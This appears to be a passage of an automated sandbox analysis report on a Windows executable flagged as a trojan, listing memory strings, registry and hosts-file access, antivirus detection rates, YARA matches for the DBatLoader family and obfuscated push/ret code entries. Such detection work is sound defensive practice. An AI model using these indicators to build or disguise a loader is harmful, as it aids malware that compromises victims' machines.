                Source: ncIpox4w8f.exe, 00000000.00000003.388263630.000000000571D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.338081452.000000000547E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.450363927.000000000573C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.374757454.000000000573F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.240534999.0000000002A65000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.337632398.0000000005465000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.380440782.0000000005726000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000002.542901275.0000000004948000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.368223680.0000000005726000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.251246986.0000000005450000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.255700889.00000000053AF000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.258998447.00000000054CF000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.374710937.000000000573F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.406157937.0000000005862000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.343172616.0000000005586000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.256226314.0000000005450000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.385159982.0000000005905000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.275046553.0000000005394000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.266317297.0000000005450000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.297850241.0000000005521000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.500935836.000000000591C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.355690666.0000000005838000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.251432713.0000000005960000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.460787318.0000000005820000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.248779012.000000000536E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.253129631.000000000546B000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.263716532.0000000005513000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.346332904.0000000005B40000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.460960103.000000000591C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.342415222.000000000548F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000002.546590003.0000000005915000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.334629901.0000000005452000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.283765306.000000000503B000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.335252597.0000000005530000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.347823262.00000000054B8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.284827116.0000000004F66000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.357713092.000000000573C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.260505908.00000000053D8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.342053668.000000000548F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.292933945.000000000543C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000002.526037866.00000000029B6000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.242497567.0000000004A40000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.372398660.00000000058FA000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.388936756.00000000058FC000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.500896292.0000000005820000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.358346503.0000000005838000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.295594884.0000000005508000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.307378246.000000000553C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.393431121.0000000005914000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.310880187.0000000005504000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.280398083.00000000054A3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.239564006.0000000002294000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCOMCTL32.DLL.MUIj% vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.359907899.0000000005862000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.350215269.0000000005344000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.479288556.000000000573C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.348550573.0000000005833000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.329004245.000000000553F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.438089139.000000000573C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.280941754.00000000053BE000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.325307082.0000000005525000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.391223311.0000000005818000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.298790955.000000000544C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.294942550.0000000004F66000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.245902021.0000000004A1C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.260868247.0000000005403000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.305046419.0000000005544000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.352750337.0000000005844000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.249116126.0000000005450000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.263825042.000000000542D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.261206908.0000000005403000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.382707853.0000000005820000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.334182241.000000000536E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.346214007.0000000005B40000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.348619285.0000000005833000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.358820088.0000000005862000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000002.528523959.0000000002A7E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.298783628.000000000543B000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.385148499.00000000058FC000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.256020027.00000000053AF000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.276156210.00000000053AD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.253337655.000000000536C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.240123178.00000000029C0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.272943807.0000000004942000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.298420443.000000000543B000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.289556756.0000000005536000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.256028855.00000000053C8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.258735530.00000000053F2000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.385753682.00000000059E2000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.329366677.000000000494A000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.307281803.000000000553C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.398037747.0000000005808000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000002.538214113.0000000002BA6000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.373977947.0000000005726000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.468274077.0000000005818000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000000.239059711.00000000004AC000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.358518020.0000000005851000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.486957885.0000000005920000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.298866890.000000000544C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.369814490.0000000005862000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.371769839.00000000058FA000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                Source: ncIpox4w8f.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: C:\Users\user\Desktop\ncIpox4w8f.exeSection loaded: system.dll
                Source: C:\Users\user\Desktop\ncIpox4w8f.exeCode function: 0_3_029C4F14
                Source: C:\Users\user\Desktop\ncIpox4w8f.exeCode function: 0_3_029C138F
                Source: C:\Users\user\Desktop\ncIpox4w8f.exeCode function: 0_3_02A0F8C1
                Source: C:\Users\user\Desktop\ncIpox4w8f.exeCode function: 0_3_029B8117
                Source: ncIpox4w8f.exeStatic PE information: Resource name: RT_STRING type: COM executable for DOS
                Source: ncIpox4w8f.exeVirustotal: Detection: 52%
                Source: ncIpox4w8f.exeReversingLabs: Detection: 55%
                Source: C:\Users\user\Desktop\ncIpox4w8f.exeFile read: C:\Users\user\Desktop\ncIpox4w8f.exeJump to behavior
                Source: C:\Users\user\Desktop\ncIpox4w8f.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: C:\Users\user\Desktop\ncIpox4w8f.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                Source: C:\Users\user\Desktop\ncIpox4w8f.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                Source: C:\Users\user\Desktop\ncIpox4w8f.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B091E540-83E3-11CF-A713-0020AFD79762}\InProcServer32
                Source: classification engineClassification label: mal80.troj.winEXE@1/0@1/1
                Source: C:\Users\user\Desktop\ncIpox4w8f.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\ncIpox4w8f.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior

                Data Obfuscation

                barindex
                Yara detected DBatLoader
                Source: Yara matchFile source: ncIpox4w8f.exe, type: SAMPLE
                Source: Yara matchFile source: 0.0.ncIpox4w8f.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000000.238770915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.528757099.0000000002AC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.316597179.000000000540C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.297908164.0000000005536000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.388263630.000000000571D000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.267479672.0000000005250000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.280613950.0000000005258000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.325641220.000000000532C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.370720405.0000000005803000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.304401425.000000000532F000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.266317297.0000000005450000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.272943807.0000000004942000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.371769839.00000000058FA000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.516088512.0000000002290000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.377241970.0000000005825000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.345105866.00000000054B9000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.286610095.0000000005061000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.284258980.0000000004F55000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.309310644.0000000005330000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\ncIpox4w8f.exeCode function: 0_3_02A0EEA5 push 004A0C11h; ret
                Source: C:\Users\user\Desktop\ncIpox4w8f.exeCode function: 0_3_02A11DB5 push 004A38A0h; ret
                Source: C:\Users\user\Desktop\ncIpox4w8f.exeCode function: 0_3_02A11D3D push 004A3816h; ret
                Source: C:\Users\user\Desktop\ncIpox4w8f.exeCode function: 0_3_02A11D69 push 004A385Eh; ret
                Source: C:\Users\user\Desktop\ncIpox4w8f.exeCode function: 0_3_02A11DF9 push 004A38D2h; ret
                Source: C:\Users\user\Desktop\ncIpox4w8f.exeCode function: 0_3_02A0F9D5 push 004A14B3h; ret
                Source: C:\Users\user\Desktop\ncIpox4w8f.exeCode function: 0_3_029BA593 push 004A3816h; ret
                Source: C:\Users\user\Desktop\ncIpox4w8f.exeCode function: 0_3_029BA5BF push 004A385Eh; ret
                Source: C:\Users\user\Desktop\ncIpox4w8f.exeCode function: 0_3_029BA60B push 004A38A0h; ret
                Source: C:\Users\user\Desktop\ncIpox4w8f.exeCode function: 0_3_029B822B push 004A14B3h; ret
                Source: C:\Users\user\Desktop\ncIpox4w8f.exeCode function: 0_3_029BA64F push 004A38D2h; ret
                Source: C:\Users\user\Desktop\ncIpox4w8f.exeCode function: 0_3_029BA777 push 380043CAh; retf 0043h
                Source: C:\Users\user\Desktop\ncIpox4w8f.exeCode function: 0_3_0493CD38 push eax; ret
                Source: C:\Users\user\Desktop\ncIpox4w8f.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\ncIpox4w8f.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\ncIpox4w8f.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\ncIpox4w8f.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\ncIpox4w8f.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\ncIpox4w8f.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\ncIpox4w8f.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\ncIpox4w8f.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\ncIpox4w8f.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\ncIpox4w8f.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\ncIpox4w8f.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\ncIpox4w8f.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\ncIpox4w8f.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\ncIpox4w8f.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\ncIpox4w8f.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\ncIpox4w8f.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\ncIpox4w8f.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\ncIpox4w8f.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\ncIpox4w8f.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\ncIpox4w8f.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\ncIpox4w8f.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\ncIpox4w8f.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\ncIpox4w8f.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\ncIpox4w8f.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\ncIpox4w8f.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\ncIpox4w8f.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\ncIpox4w8f.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\ncIpox4w8f.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\ncIpox4w8f.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\ncIpox4w8f.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\ncIpox4w8f.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\ncIpox4w8f.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\ncIpox4w8f.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\ncIpox4w8f.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\ncIpox4w8f.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\ncIpox4w8f.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\ncIpox4w8f.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\ncIpox4w8f.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\ncIpox4w8f.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\ncIpox4w8f.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\ncIpox4w8f.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\ncIpox4w8f.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\ncIpox4w8f.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\ncIpox4w8f.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\ncIpox4w8f.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\ncIpox4w8f.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\ncIpox4w8f.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
